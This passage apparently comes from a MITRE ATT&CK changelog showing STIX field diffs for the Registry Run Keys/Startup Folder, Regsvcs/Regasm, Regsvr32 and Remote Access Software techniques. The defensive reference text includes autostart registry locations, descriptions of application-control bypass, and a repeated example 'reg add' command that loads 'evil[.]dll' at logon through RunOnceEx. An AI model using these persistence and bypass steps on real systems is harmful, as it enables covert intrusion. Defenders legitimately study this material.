| external_references[7]['url'] | https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ | https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html |
| external_references[8]['source_name'] | MDSec Detecting DOTNET | Introducing Donut |
| external_references[8]['description'] | MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. | The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. |
| external_references[8]['url'] | https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ | https://thewover.github.io/Introducing-Donut/ |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Joas Antonio dos Santos, @C0d3Cr4zy |
| Old Description | New Description |
|---|---|
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020. | |
| external_references | CAPEC-270 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-270 | |
| external_references | Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 18:36:29.226000+00:00 | 2022-06-16 13:06:00.638000+00:00 |
| description | Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. |
| external_references[1]['source_name'] | capec | Malwarebytes Wow6432Node 2016 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/270.html | https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ |
| external_references[2]['source_name'] | Microsoft Run Key | Microsoft Wow6432Node 2018 |
| external_references[2]['description'] | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. | Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020. |
| external_references[2]['url'] | http://msdn.microsoft.com/en-us/library/aa376977 | https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry |
| external_references[3]['source_name'] | Microsoft Wow6432Node 2018 | Microsoft Run Key |
| external_references[3]['description'] | Microsoft. (2018, May 31). 32-bit and 64-bit Application Data in the Registry. Retrieved August 3, 2020. | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry | http://msdn.microsoft.com/en-us/library/aa376977 |
| external_references[4]['source_name'] | Malwarebytes Wow6432Node 2016 | Oddvar Moe RunOnceEx Mar 2018 |
| external_references[4]['description'] | Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved August 3, 2020. | Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018. |
| external_references[4]['url'] | https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ | https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
| external_references[5]['source_name'] | Microsoft RunOnceEx APR 2018 | TechNet Autoruns |
| external_references[5]['description'] | Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[5]['url'] | https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[6]['source_name'] | Oddvar Moe RunOnceEx Mar 2018 | capec |
| external_references[6]['url'] | https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ | https://capec.mitre.org/data/definitions/270.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Process: Process Creation | Windows Registry: Windows Registry Key Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Dray Agha, @Purp1eW0lf, Huntress Labs |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} |
| Old Description | New Description |
|---|---|
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:36:37.411000+00:00 | 2022-03-11 18:55:48.725000+00:00 |
| description | Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:37:32.931000+00:00 | 2022-03-11 20:41:41.503000+00:00 |
| description | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Module: Module Load |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land) Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 20:42:37.320000+00:00 | 2022-04-21 14:54:10.899000+00:00 |
| description | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, 